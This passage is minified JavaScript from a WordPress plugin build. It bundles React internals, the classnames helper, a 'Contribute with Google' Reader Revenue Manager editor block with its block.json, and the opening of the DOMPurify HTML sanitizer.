a=Array(s),l=0;l<s;l++)a[l]=arguments[l+2];o.children=a}if(e&&e.defaultProps)for(n in s=e.defaultProps)void 0===o[n]&&(o[n]=s[n]);return{$$typeof:i,type:e,key:c,ref:u,props:o,_owner:O.current}}function A(e){return"object"==typeof e&&null!==e&&e.$$typeof===i}var x=/\/+/g,R=[];function M(e,t,r,n){if(R.length){var o=R.pop();return o.result=e,o.keyPrefix=t,o.func=r,o.context=n,o.count=0,o}return{result:e,keyPrefix:t,func:r,context:n,count:0}}function N(e){e.result=null,e.keyPrefix=null,e.func=null,e.context=null,e.count=0,10>R.length&&R.push(e)}function q(e,t,r,n){var o=typeof e;"undefined"!==o&&"boolean"!==o||(e=null);var u=!1;if(null===e)u=!0;else switch(o){case"string":case"number":u=!0;break;case"object":switch(e.$$typeof){case i:case c:u=!0}}if(u)return r(n,e,""===t?"."+T(e,0):t),1;if(u=0,t=""===t?".":t+":",Array.isArray(e))for(var s=0;s<e.length;s++){var a=t+T(o=e[s],s);u+=q(o,a,r,n)}else if(null===e||"object"!=typeof e?a=null:a="function"==typeof(a=h&&e[h]||e["@@iterator"])?a:null,"function"==typeof a)for(e=a.call(e),s=0;!(o=e.next()).done;)u+=q(o=o.value,a=t+T(o,s++),r,n);else if("object"===o)throw r=""+e,Error(b(31,"[object Object]"===r?"object with keys {"+Object.keys(e).join(", ")+"}":r,""));return u}function C(e,t,r){return null==e?0:q(e,"",t,r)}function T(e,t){return"object"==typeof e&&null!==e&&null!=e.key?function(e){var t={"=":"=0",":":"=2"};return"$"+(""+e).replace(/[=:]/g,function(e){return t[e]})}(e.key):t.toString(36)}function $(e,t){e.func.call(e.context,t,e.count++)}function W(e,t,r){var n=e.result,o=e.keyPrefix;e=e.func.call(e.context,t,e.count++),Array.isArray(e)?I(e,n,r,function(e){return e}):null!=e&&(A(e)&&(e=function(e,t){return{$$typeof:i,type:e.type,key:t,ref:e.ref,props:e.props,_owner:e._owner}}(e,o+(!e.key||t&&t.key===e.key?"":(""+e.key).replace(x,"$&/")+"/")+r)),n.push(e))}function I(e,t,r,n,o){var i="";null!=r&&(i=(""+r).replace(x,"$&/")+"/"),C(e,W,t=M(t,i,n,o)),N(t)}var U={current:null};function B(){var e=U.current;if(null===e)throw Error(b(321));return e}var L={ReactCurrentDispatcher:U,ReactCurrentBatchConfig:{suspense:null},ReactCurrentOwner:O,IsSomeRendererActing:{current:!1},assign:n};t.Children={map:function(e,t,r){if(null==e)return e;var n=[];return I(e,n,null,t,r),n},forEach:function(e,t,r){if(null==e)return e;C(e,$,t=M(null,null,t,r)),N(t)},count:function(e){return C(e,function(){return null},null)},toArray:function(e){var t=[];return I(e,t,null,function(e){return e}),t},only:function(e){if(!A(e))throw Error(b(143));return e}},t.Component=v,t.Fragment=u,t.Profiler=a,t.PureComponent=w,t.StrictMode=s,t.Suspense=d,t.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED=L,t.cloneElement=function(e,t,r){if(null==e)throw Error(b(267,e));var o=n({},e.props),c=e.key,u=e.ref,s=e._owner;if(null!=t){if(void 0!==t.ref&&(u=t.ref,s=O.current),void 0!==t.key&&(c=""+t.key),e.type&&e.type.defaultProps)var a=e.type.defaultProps;for(l in t)P.call(t,l)&&!E.hasOwnProperty(l)&&(o[l]=void 0===t[l]&&void 0!==a?a[l]:t[l])}var l=arguments.length-2;if(1===l)o.children=r;else if(1<l){a=Array(l);for(var p=0;p<l;p++)a[p]=arguments[p+2];o.children=a}return{$$typeof:i,type:e.type,key:c,ref:u,props:o,_owner:s}},t.createContext=function(e,t){return void 0===t&&(t=null),(e={$$typeof:p,_calculateChangedBits:t,_currentValue:e,_currentValue2:e,_threadCount:0,Provider:null,Consumer:null}).Provider={$$typeof:l,_context:e},e.Consumer=e},t.createElement=j,t.createFactory=function(e){var t=j.bind(null,e);return t.type=e,t},t.createRef=function(){return{current:null}},t.forwardRef=function(e){return{$$typeof:f,render:e}},t.isValidElement=A,t.lazy=function(e){return{$$typeof:_,_ctor:e,_status:-1,_result:null}},t.memo=function(e,t){return{$$typeof:y,type:e,compare:void 0===t?null:t}},t.useCallback=function(e,t){return B().useCallback(e,t)},t.useContext=function(e,t){return B().useContext(e,t)},t.useDebugValue=function(){},t.useEffect=function(e,t){return B().useEffect(e,t)},t.useImperativeHandle=function(e,t,r){return B().useImperativeHandle(e,t,r)},t.useLayoutEffect=function(e,t){return B().useLayoutEffect(e,t)},t.useMemo=function(e,t){return B().useMemo(e,t)},t.useReducer=function(e,t,r){return B().useReducer(e,t,r)},t.useRef=function(e){return B().useRef(e)},t.useState=function(e){return B().useState(e)},t.version="16.14.0"},441:e=>{"use strict";e.exports="SECRET_DO_NOT_PASS_THIS_OR_YOU_WILL_BE_FIRED"},452:e=>{!function(){"use strict";var t={}.hasOwnProperty;function r(){for(var e="",t=0;t<arguments.length;t++){var r=arguments[t];r&&(e=o(e,n(r)))}return e}function n(e){if("string"==typeof e||"number"==typeof e)return e;if("object"!=typeof e)return"";if(Array.isArray(e))return r.apply(null,e);if(e.toString!==Object.prototype.toString&&!e.toString.toString().includes("[native code]"))return e.toString();var n="";for(var i in e)t.call(e,i)&&e[i]&&(n=o(n,i));return n}function o(e,t){return t?e?e+" "+t:e+t:e}e.exports?(r.default=r,e.exports=r):"function"==typeof define&&"object"==typeof define.amd&&define.amd?define("classnames",[],function(){return r}):window.classNames=r}()},540:(e,t,r)=>{"use strict";e.exports=r(192)},664:e=>{"use strict";var t=Object.getOwnPropertySymbols,r=Object.prototype.hasOwnProperty,n=Object.prototype.propertyIsEnumerable;e.exports=function(){try{if(!Object.assign)return!1;var e=new String("abc");if(e[5]="de","5"===Object.getOwnPropertyNames(e)[0])return!1;for(var t={},r=0;r<10;r++)t["_"+String.fromCharCode(r)]=r;if("0123456789"!==Object.getOwnPropertyNames(t).map(function(e){return t[e]}).join(""))return!1;var n={};return"abcdefghijklmnopqrst".split("").forEach(function(e){n[e]=e}),"abcdefghijklmnopqrst"===Object.keys(Object.assign({},n)).join("")}catch(e){return!1}}()?Object.assign:function(e,o){for(var i,c,u=function(e){if(null==e)throw new TypeError("Object.assign cannot be called with null or undefined");return Object(e)}(e),s=1;s<arguments.length;s++){for(var a in i=Object(arguments[s]))r.call(i,a)&&(u[a]=i[a]);if(t){c=t(i);for(var l=0;l<c.length;l++)n.call(i,c[l])&&(u[c[l]]=i[c[l]])}}return u}},688:(e,t,r)=>{e.exports=r(362)()},696:(e,t,r)=>{"use strict";e.exports=r(403)}},t={};function __webpack_require__(r){var n=t[r];if(void 0!==n)return n.exports;var o=t[r]={exports:{}};return e[r](o,o.exports,__webpack_require__),o.exports}__webpack_require__.n=e=>{var t=e&&e.__esModule?()=>e.default:()=>e;return __webpack_require__.d(t,{a:t}),t},__webpack_require__.d=(e,t)=>{for(var r in t)__webpack_require__.o(t,r)&&!__webpack_require__.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:t[r]})},__webpack_require__.o=(e,t)=>Object.prototype.hasOwnProperty.call(e,t),(()=>{"use strict";const e=wp.blocks,t=googlesitekit.data,r="core/modules",n="kmAnalyticsTopCategories",o="modules/reader-revenue-manager",i=googlesitekit.i18n,c=((0,i.__)("Specific content types","google-site-kit"),(0,i.__)("Specified pages","google-site-kit"),(0,i.__)("Site wide","google-site-kit"),"reader-revenue-manager"),u="core/editor",s=wp.components,a=wp.element;var l,p=__webpack_require__(452),f=__webpack_require__.n(p),d=__webpack_require__(688),y=__webpack_require__.n(d),_=__webpack_require__(696);function h(){return h=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)({}).hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e},h.apply(null,arguments)}const b=e=>_.createElement("svg",h({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 43 44"},e),l||(l=_.createElement("g",{fill:"none",fillRule:"evenodd"},_.createElement("path",{fill:"#FBBC05",d:"m2.253 12.252 7.399 5.658A13 13 0 0 0 9 22c0 1.43.229 2.805.652 4.09l-7.4 5.658A22 22 0 0 1 0 22c0-3.506.81-6.814 2.253-9.748"}),_.createElement("path",{fill:"#EA4335",d:"m9.652 17.91-7.4-5.658A21.94 21.94 0 0 1 22 0c5.6 0 10.6 2.1 14.5 5.5l-6.4 6.4C27.9 10.1 25.1 9 22 9c-5.77 0-10.64 3.725-12.348 8.91"}),_.createElement("path",{fill:"#34A853",d:"m2.25 31.742 7.396-5.67A12.975 12.975 0 0 0 22 35c6.1 0 10.7-3.1 11.8-8.5H22V18h20.5c.3 1.3.5 2.7.5 4 0 14-10 22-21 22A21.94 21.94 0 0 1 2.25 31.742"}),_.createElement("path",{fill:"#4285F4",d:"m36.34 38.52-7.025-5.437c2.297-1.45 3.895-3.685 4.485-6.583H22V18h20.5c.3 1.3.5 2.7.5 4 0 7.17-2.623 12.767-6.66 16.52"}))));var m=__webpack_require__(540);function EditorButton({children:e,disabled:t}){return(0,m.jsxs)("button",{disabled:t,className:f()("googlesitekit-blocks-reader-revenue-manager-button",{"googlesitekit-blocks-reader-revenue-manager-button--disabled":t}),children:[(0,m.jsx)(b,{height:"18",width:"18"}),e]})}EditorButton.propTypes={children:y().node.isRequired,disabled:y().bool.isRequired};const g=wp.blockEditor,v=wp.data;function k({hasModuleAccess:e,withModuleAccessNotice:t,withoutModuleAccessNotice:r}){return void 0===e?null:e?t:r}function ButtonEdit({buttonLabel:e,requiredPaymentOption:n,invalidPaymentOptionWithModuleAccessNotice:i,invalidPaymentOptionWithoutModuleAccessNotice:l,noSnippetWithModuleAccessNotice:p,noSnippetWithoutModuleAccessNotice:f}){const[d,y]=(0,a.useState)(void 0),_=(0,g.useBlockProps)();(0,a.useEffect)(()=>{!async function(){let e=(0,t.select)(r).hasModuleOwnership(c);!1===e&&(e=await(0,t.resolveSelect)(r).hasModuleAccess(c)),y(!!e)}()},[]);const h=(0,t.select)(o).getSettings(),{publicationID:b,paymentOption:w,snippetMode:S,postTypes:O}=h,P=`googlesitekit_rrm_${b}:productID`,E=(0,v.useSelect)(e=>e(u).getEditedPostAttribute("meta")?.[P]||""),j=(0,v.useSelect)(e=>e(u).getCurrentPostType()),{notice:A,disabled:x}=function({paymentOption:e,requiredPaymentOption:t,hasModuleAccess:r,postProductID:n,snippetMode:o,postTypes:i,postType:c,invalidPaymentOptionWithModuleAccessNotice:u,invalidPaymentOptionWithoutModuleAccessNotice:s,noSnippetWithModuleAccessNotice:a,noSnippetWithoutModuleAccessNotice:l}){return e!==t?{disabled:!0,notice:k({hasModuleAccess:r,withModuleAccessNotice:u,withoutModuleAccessNotice:s})}:"none"===n||!n&&"per_post"===o||!n&&"post_types"===o&&!i.includes(c)?{disabled:!0,notice:k({hasModuleAccess:r,withModuleAccessNotice:a,withoutModuleAccessNotice:l})}:{disabled:!1,notice:null}}({paymentOption:w,requiredPaymentOption:n,hasModuleAccess:d,postProductID:E,snippetMode:S,postTypes:O,postType:j,invalidPaymentOptionWithModuleAccessNotice:i,invalidPaymentOptionWithoutModuleAccessNotice:l,noSnippetWithModuleAccessNotice:p,noSnippetWithoutModuleAccessNotice:f});return(0,m.jsxs)(a.Fragment,{children:[A&&(0,m.jsx)(g.InspectorControls,{children:(0,m.jsx)("div",{className:"block-editor-block-card",children:(0,m.jsx)(s.Notice,{status:"warning",isDismissible:!1,children:A})})}),(0,m.jsx)("div",{..._,children:(0,m.jsx)("div",{className:"googlesitekit-blocks-reader-revenue-manager",children:(0,m.jsx)(EditorButton,{disabled:x,children:e})})})]})}function Edit(){const e=(0,t.select)(o).getPublicationID(),r=(0,t.select)(o).getServiceURL({path:"reader-revenue-manager",query:{publication:e}});return(0,m.jsx)(ButtonEdit,{buttonLabel:/* translators: Button label for Contribute with Google. See: https://github.com/subscriptions-project/swg-js/blob/05af2d45cfcaf831a6b4d35c28f2c7b5c2e39308/src/i18n/swg-strings.ts#L58-L91 (please refer to the latest version of the file) */ /* translators: Button label for Contribute with Google. See: https://github.com/subscriptions-project/swg-js/blob/05af2d45cfcaf831a6b4d35c28f2c7b5c2e39308/src/i18n/swg-strings.ts#L58-L91 (please refer to the latest version of the file) */ (0,i.__)("Contribute with Google","google-site-kit"),requiredPaymentOption:"contributions",invalidPaymentOptionWithModuleAccessNotice:(0,a.createInterpolateElement)((0,i.__)("You need to set up a contributions request in Reader Revenue Manager to use this block. <a>Go to Reader Revenue Manager</a>","google-site-kit"),{a:(0,m.jsx)(s.ExternalLink,{href:r})}),invalidPaymentOptionWithoutModuleAccessNotice:(0,i.__)("You need to set up a contributions request in Reader Revenue Manager to use this block. Contact your administrator.","google-site-kit"),noSnippetWithModuleAccessNotice:(0,a.createInterpolateElement)((0,i.__)("This post does not include the Reader Revenue Manager snippet. Configure the snippet for this post in the post settings sidebar.","google-site-kit"),{a:(0,m.jsx)(s.ExternalLink,{href:r})}),noSnippetWithoutModuleAccessNotice:(0,i.__)("This post does not include the Reader Revenue Manager snippet. Contact your administrator","google-site-kit")})}ButtonEdit.propTypes={buttonLabel:y().string.isRequired,requiredPaymentOption:y().string.isRequired,invalidPaymentOptionWithModuleAccessNotice:y().node.isRequired,invalidPaymentOptionWithoutModuleAccessNotice:y().node.isRequired,noSnippetWithModuleAccessNotice:y().node.isRequired,noSnippetWithoutModuleAccessNotice:y().node.isRequired};const w=JSON.parse('{"UU":"google-site-kit/rrm-contribute-with-google"}');!async function(){await Promise.all([(0,t.resolveSelect)(r).getModule(c),(0,t.resolveSelect)("core/user").getUser(),(0,t.resolveSelect)(o).getSettings()]);const n=!!(0,t.select)("core/edit-site");(0,e.registerBlockType)(w.UU,{edit:()=>n?null:(0,m.jsx)(Edit,{}),supports:{inserter:!n}})}()})()})();{ "$schema": "https://schemas.wp.org/trunk/block.json", "apiVersion": 3, "name": "google-site-kit/rrm-contribute-with-google", "version": "1.170.0", "title": "Contribute with Google", "category": "widgets", "icon": "google", "description": "Allow users to make voluntary contributions using Reader Revenue Manager.", "textdomain": "google-site-kit", "supports": { "inserter": true } } .block-editor__container .googlesitekit-rrm-settings-panel .googlesitekit-rrm-panel__select-control label{text-transform:none;white-space:normal} (()=>{var t={91:t=>{"use strict";t.exports=function(t,e,n,r,o,i,u,a){if(!t){var c;if(void 0===e)c=new Error("Minified exception occurred; use the non-minified dev environment for the full error message and additional helpful warnings.");else{var f=[n,r,o,i,u,a],l=0;(c=new Error(e.replace(/%s/g,function(){return f[l++]}))).name="Invariant Violation"}throw c.framesToPop=1,c}}},192:(t,e,n)=>{"use strict";var r=n(696),o=60103;if("function"==typeof Symbol&&Symbol.for){var i=Symbol.for;o=i("react.element"),i("react.fragment")}var u=r.__SECRET_INTERNALS_DO_NOT_USE_OR_YOU_WILL_BE_FIRED.ReactCurrentOwner,a=Object.prototype.hasOwnProperty,c={key:!0,ref:!0,__self:!0,__source:!0};function f(t,e,n){var r,i={},f=null,l=null;for(r in void 0!==n&&(f=""+n),void 0!==e.key&&(f=""+e.key),void 0!==e.ref&&(l=e.ref),e)a.call(e,r)&&!c.hasOwnProperty(r)&&(i[r]=e[r]);if(t&&t.defaultProps)for(r in e=t.defaultProps)void 0===i[r]&&(i[r]=e[r]);return{$$typeof:o,type:t,key:f,ref:l,props:i,_owner:u.current}}e.jsx=f,e.jsxs=f},234:function(t){t.exports=function(){"use strict";function t(e){return t="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t},t(e)}function e(t,n){return e=Object.setPrototypeOf||function(t,e){return t.__proto__=e,t},e(t,n)}function n(){if("undefined"==typeof Reflect||!Reflect.construct)return!1;if(Reflect.construct.sham)return!1;if("function"==typeof Proxy)return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(t){return!1}}function r(t,o,i){return r=n()?Reflect.construct:function(t,n,r){var o=[null];o.push.apply(o,n);var i=new(Function.bind.apply(t,o));return r&&e(i,r.prototype),i},r.apply(null,arguments)}function o(t){return i(t)||u(t)||a(t)||_nonIterableSpread()}function i(t){if(Array.isArray(t))return c(t)}function u(t){if("undefined"!=typeof Symbol&&null!=t[Symbol.iterator]||null!=t["@@iterator"])return Array.from(t)}function a(t,e){if(t){if("string"==typeof t)return c(t,e);var n=Object.prototype.toString.call(t).slice(8,-1);return"Object"===n&&t.constructor&&(n=t.constructor.name),"Map"===n||"Set"===n?Array.from(t):"Arguments"===n||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n)?c(t,e):void 0}}function c(t,e){(null==e||e>t.length)&&(e=t.length);for(var n=0,r=new Array(e);n<e;n++)r[n]=t[n];return r}function _nonIterableSpread(){throw new TypeError("Invalid attempt to spread non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}var f=Object.hasOwnProperty,l=Object.setPrototypeOf,s=Object.isFrozen,p=Object.getPrototypeOf,h=Object.getOwnPropertyDescriptor,g=Object.freeze,_=Object.seal,v=Object.create,d="undefined"!=typeof Reflect&&Reflect,y=d.apply,m=d.construct;y||(y=function(t,e,n){return t.apply(e,n)}),g||(g=function(t){return t}),_||(_=function(t){return t}),m||(m=function(t,e){return r(t,o(e))});var b=R(Array.prototype.forEach),w=R(Array.prototype.pop),k=R(Array.prototype.push),S=R(String.prototype.toLowerCase),x=R(String.prototype.toString),A=R(String.prototype.match),E=R(String.prototype.replace),T=R(String.prototype.indexOf),L=R(String.prototype.trim),O=R(RegExp.prototype.test),C=j(TypeError);function R(t){return function(e){for(var n=arguments.length,r=new Array(n>1?n-1:0),o=1;o<n;o++)r[o-1]=arguments[o];return y(t,e,r)}}function j(t){return function(){for(var e=arguments.length,n=new Array(e),r=0;r<e;r++)n[r]=arguments[r];return m(t,n)}}function N(t,e,n){var r;n=null!==(r=n)&&void 0!==r?r:S,l&&l(t,null);for(var o=e.length;o--;){var i=e[o];if("string"==typeof i){var u=n(i);u!==i&&(s(e)||(e[o]=u),i=u)}t[i]=!0}return t}function I(t){var e,n=v(null);for(e in t)!0===y(f,t,[e])&&(n[e]=t[e]);return n}function D(t,e){for(;null!==t;){var n=h(t,e);if(n){if(n.get)return R(n.get);if("function"==typeof n.value)return R(n.value)}t=p(t)}function r(t){return console.warn("fallback value for",t),null}return r}var z=g(["a","abbr","acronym","address","area","article","aside","audio","b","bdi","bdo","big","blink","blockquote","body","br","button","canvas","caption","center","cite","code","col","colgroup","content","data","datalist","dd","decorator","del","details","dfn","dialog","dir","div","dl","dt","element","em","fieldset","figcaption","figure","font","footer","form","h1","h2","h3","h4","h5","h6","head","header","hgroup","hr","html","i","img","input","ins","kbd","label","legend","li","main","map","mark","marquee","menu","menuitem","meter","nav","nobr","ol","optgroup","option","output","p","picture","pre","progress","q","rp","rt","ruby","s","samp","section","select","shadow","small","source","spacer","span","strike","strong","style","sub","summary","sup","table","tbody","td","template","textarea","tfoot","th","thead","time","tr","track","tt","u","ul","var","video","wbr"]),M=g(["svg","a","altglyph","altglyphdef","altglyphitem","animatecolor","animatemotion","animatetransform","circle","clippath","defs","desc","ellipse","filter","font","g","glyph","glyphref","hkern","image","line","lineargradient","marker","mask","metadata","mpath","path","pattern","polygon","polyline","radialgradient","rect","stop","style","switch","symbol","text","textpath","title","tref","tspan","view","vkern"]),W=g(["feBlend","feColorMatrix","feComponentTransfer","feComposite","feConvolveMatrix","feDiffuseLighting","feDisplacementMap","feDistantLight","feFlood","feFuncA","feFuncB","feFuncG","feFuncR","feGaussianBlur","feImage","feMerge","feMergeNode","feMorphology","feOffset","fePointLight","feSpecularLighting","feSpotLight","feTile","feTurbulence"]),P=g(["animate","color-profile","cursor","discard","fedropshadow","font-face","font-face-format","font-face-name","font-face-src","font-face-uri","foreignobject","hatch","hatchpath","mesh","meshgradient","meshpatch","meshrow","missing-glyph","script","set","solidcolor","unknown","use"]),U=g(["math","menclose","merror","mfenced","mfrac","mglyph","mi","mlabeledtr","mmultiscripts","mn","mo","mover","mpadded","mphantom","mroot","mrow","ms","mspace","msqrt","mstyle","msub","msup","msubsup","mtable","mtd","mtext","mtr","munder","munderover"]),B=g(["maction","maligngroup","malignmark","mlongdiv","mscarries","mscarry","msgroup","mstack","msline","msrow","semantics","annotation","annotation-xml","mprescripts","none"]),F=g(["#text"]),$=g(["accept","action","align","alt","autocapitalize","autocomplete","autopictureinpicture","autoplay","background","bgcolor","border","capture","cellpadding","cellspacing","checked","cite","class","clear","color","cols","colspan","controls","controlslist","coords","crossorigin","datetime","decoding","default","dir","disabled","disablepictureinpicture","disableremoteplayback","download","draggable","enctype","enterkeyhint","face","for","headers","height","hidden","high","href","hreflang","id","inputmode","integrity","ismap","kind","label","lang","list","loading","loop","low","max","maxlength","media","method","min","minlength","multiple","muted","name","nonce","noshade","novalidate","nowrap","open","optimum","pattern","placeholder","playsinline","poster","preload","pubdate","radiogroup","readonly","rel","required","rev","reversed","role","rows","rowspan","spellcheck","scope","selected","shape","size","sizes","span","srclang","start","src","srcset","step","style","summary","tabindex","title","translate","type","usemap","valign","value","width","xmlns","slot"]),H=g(["accent-height","accumulate","additive","alignment-baseline","ascent","attributename","attributetype","azimuth","basefrequency","baseline-shift","begin","bias","by","class","clip","clippathunits","clip-path","clip-rule","color","color-interpolation","color-interpolation-filters","color-profile","color-rendering","cx","cy","d","dx","dy","diffuseconstant","direction","display","divisor","dur","edgemode","elevation","end","fill","fill-opacity","fill-rule","filter","filterunits","flood-color","flood-opacity","font-family","font-size","font-size-adjust","font-stretch","font-style","font-variant","font-weight","fx","fy","g1","g2","glyph-name","glyphref","gradientunits","gradienttransform","height","href","id","image-rendering","in","in2","k","k1","k2","k3","k4","kerning","keypoints","keysplines","keytimes","lang","lengthadjust","letter-spacing","kernelmatrix","kernelunitlength","lighting-color","local","marker-end","marker-mid","marker-start","markerheight","markerunits","markerwidth","maskcontentunits","maskunits","max","mask","media","method","mode","min","name","numoctaves","offset","operator","opacity","order","orient","orientation","origin","overflow","paint-order","path","pathlength","patterncontentunits","patterntransform","patternunits","points","preservealpha","preserveaspectratio","primitiveunits","r","rx","ry","radius","refx","refy","repeatcount","repeatdur","restart","result","rotate","scale","seed","shape-rendering","specularconstant","specularexponent","spreadmethod","startoffset","stddeviation","stitchtiles","stop-color","stop-opacity","stroke-dasharray","stroke-dashoffset","stroke-linecap","stroke-linejoin","stroke-miterlimit","stroke-opacity","stroke","stroke-width","style","surfacescale","systemlanguage","tabindex","targetx","targety","transform","transform-origin","text-anchor","text-decoration","text-rendering","textlength","type","u1","u2","unicode","values","viewbox","visibility","version","vert-adv-y","vert-origin-x","vert-origin-y","width","word-spacing","wrap","writing-mode","xchannelselector","ychannelselector","x","x1","x2","xmlns","y","y1","y2","z","zoomandpan"]),q=g(["accent","accentunder","align","bevelled","close","columnsalign","columnlines","columnspan","denomalign","depth","dir","display","displaystyle","encoding","fence","frame","height","href","id","largeop","length","linethickness","lspace","lquote","mathbackground","mathcolor","mathsize","mathvariant","maxsize","minsize","movablelimits","notation","numalign","open","rowalign","rowlines","rowspacing","rowspan","rspace","rquote","scriptlevel","scriptminsize","scriptsizemultiplier","selection","separator","separators","stretchy","subscriptshift","supscriptshift","symmetric","voffset","width","xmlns"]),G=g(["xlink:href","xml:id","xlink:title","xml:space","xmlns:xlink"]),V=_(/\{\{[\w\W]*|[\w\W]*\}\}/gm),K=_(/<%[\w\W]*|[\w\W]*%>/gm),Z=_(/\${[\w\W]*}/gm),Y=_(/^data-[\-\w.\u00B7-\uFFFF]+$/),J=_(/^aria-[\-\w]+$/),X=_(/^(?:(?:(?:f|ht)tps?|mailto|tel|callto|cid|xmpp):|[^a-z]|[a-z+.\-]+(?:[^a-z+.\-:]|$))/i),Q=_(/^(?:\w+script|data):/i),tt=_(/[\u0000-\u0020\u00A0\u1680\u180E\u2000-\u2029\u205F\u3000]/g),et=_(/^html$/i),nt=_(/^[a-z][.\w]*(-[.\w]+)+$/i),rt=function(){return"undefined"==typeof window?null:window},ot=function(e,n){if("object"!==t(e)||"function"!=typeof e.createPolicy)return null;var r=null,o="data-tt-policy-suffix";n.currentScript&&n.currentScript.hasAttribute(o)&&(r=n.currentScript.getAttribute(o));var i="dompurify"+(r?"#"+r:"");try{return e.createPolicy(i,{createHTML:function(t){return t},createScriptURL:function(t){return t}})}catch(t){return console.warn("TrustedTypes policy "+i+" could not be created."),null}};function it(){var e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:rt(),n=function DOMPurify(t){return it(t)};if(n.version="2.5.8",n.removed=[],!e||!e.document||9!==e.document.nodeType)return n.isSupported=!1,n;var r=e.document,i=e.document,u=e.DocumentFragment,a=e.HTMLTemplateElement,c=e.Node,f=e.Element,l=e.NodeFilter,s=e.NamedNodeMap,p=void 0===s?e.NamedNodeMap||e.MozNamedAttrMap:s,h=e.HTMLFormElement,_=e.DOMParser,v=e.trustedTypes,d=f.prototype,y=D(d,"cloneNode"),m=D(d,"nextSibling"),R=D(d,"childNodes"),j=D(d,"parentNode");if("function"==typeof a){var ut=i.createElement("template");ut.content&&ut.content.ownerDocument&&(i=ut.content.ownerDocument)}var at=ot(v,r),ct=at?at.createHTML(""):"",ft=i,lt=ft.implementation,st=ft.createNodeIterator,pt=ft.createDocumentFragment,ht=ft.getElementsByTagName,gt=r.importNode,_t={};try{_t=I(i).documentMode?i.documentMode:{}}catch(t){}var vt={};n.isSupported="function"==typeof j&<&&void 0!==lt.createHTMLDocument&&9!==_t;var dt,yt,mt=V,bt=K,wt=Z,kt=Y,St=J,xt=Q,At=tt,Et=nt,Tt=X,Lt=null,Ot=N({},[].concat(o(z),o(M),o(W),o(U),o(F))),Ct=null,Rt=N({},[].concat(o($),o(H),o(q),o(G))),jt=Object.seal(Object.create(null,{tagNameCheck:{writable:!0,configurable:!1,enumerable:!0,value:null},attributeNameCheck:{writable:!0,configurable:!1,enumerable:!0,value:null},allowCustomizedBuiltInElements:{writable:!0,configurable:!1,enumerable:!0,value:!1}})),Nt=null,It=null,Dt=!0,zt=!0,Mt=!1,Wt=!0,Pt=!1,Ut=!0,Bt=!1,Ft=!1,$t=!1,Ht=!1,qt=!1,Gt=!1,Vt=!0,Kt=!1,Zt="user-content-",Yt=!0,Jt=!1,Xt={},Qt=null,te=N({},["annotation-xml","audio","colgroup","desc","foreignobject","head","iframe","math","mi","mn","mo","ms","mtext","noembed","noframes","noscript","plaintext","script","style","svg","template","thead","title","video","xmp"]),ee=null,ne=N({},["audio","video","img","source","image","track"]),re=null,oe=N({},["alt","class","for","id","label","name","pattern","placeholder","role","summary","title","value","style","xmlns"]),ie="http://www.w3.org/1998/Math/MathML",ue="http://www.w3.org/2000/svg",ae="http://www.w3.org/1999/xhtml",ce=ae,fe=!1,le=null,se=N({},[ie,ue,ae],x),pe=["application/xhtml+xml","text/html"],he="text/html",ge=null,_e=i.createElement("form"),ve=function(t){return t instanceof RegExp||t instanceof Function},de=function(e){ge&&ge===e||(e&&"object"===t(e)||(e={}),e=I(e),dt=dt=-1===pe.indexOf(e.PARSER_MEDIA_TYPE)?he:e.PARSER_MEDIA_TYPE,yt="application/xhtml+xml"===dt?x:S,Lt="ALLOWED_TAGS"in e?N({},e.ALLOWED_TAGS,yt):Ot,Ct="ALLOWED_ATTR"in e?N({},e.ALLOWED_ATTR,yt):Rt,le="ALLOWED_NAMESPACES"in e?N({},e.ALLOWED_NAMESPACES,x):se,re="ADD_URI_SAFE_ATTR"in e?N(I(oe),e.ADD_URI_SAFE_ATTR,yt):oe,ee="ADD_DATA_URI_TAGS"in e?N(I(ne),e.ADD_DATA_URI_TAGS,yt):ne,Qt="FORBID_CONTENTS"in e?N({},e.FORBID_CONTENTS,yt):te,Nt="FORBID_TAGS"in e?N({},e.FORBID_TAGS,yt):{},It="FORBID_ATTR"in e?N({},e.FORBID_ATTR,yt):{},Xt="USE_PROFILES"in e&&e.USE_PROFILES,Dt=!1!==e.ALLOW_ARIA_ATTR,zt=!1!==e.ALLOW_DATA_ATTR,Mt=e.ALLOW_UNKNOWN_PROTOCOLS||!1,Wt=!1!==e.ALLOW_SELF_CLOSE_IN_ATTR,Pt=e.SAFE_FOR_TEMPLATES||!1,Ut=!1!==e.SAFE_FOR_XML,Bt=e.WHOLE_DOCUMENT||!1,Ht=e.RETURN_DOM||!1,qt=e.RETURN_DOM_FRAGMENT||!1,Gt=e.RETURN_TRUSTED_TYPE||!1,$t=e.FORCE_BODY||!1,Vt=!1!==e.SANITIZE_DOM,Kt=e.SANITIZE_NAMED_PROPS||!1,Yt=!1!==e.KEEP_CONTENT,Jt=e.IN_PLACE||!1,Tt=e.ALLOWED_URI_REGEXP||Tt,ce=e.NAMESPACE||ae,jt=e.CUSTOM_ELEMENT_HANDLING||{},e.CUSTOM_ELEMENT_HANDLING&&ve(e.CUSTOM_ELEMENT_HANDLING.tagNameCheck)&&(jt.tagNameCheck=e.CUSTOM_ELEMENT_HANDLING.tagNameCheck),e.CUSTOM_ELEMENT_HANDLING&&ve(e.CUSTOM_ELEMENT_HANDLING.attributeNameCheck)&&(jt.attributeNameCheck=e.CUSTOM_ELEMENT_HANDLING.attributeNameCheck),e.CUSTOM_ELEMENT_HANDLING&&"boolean"==typeof 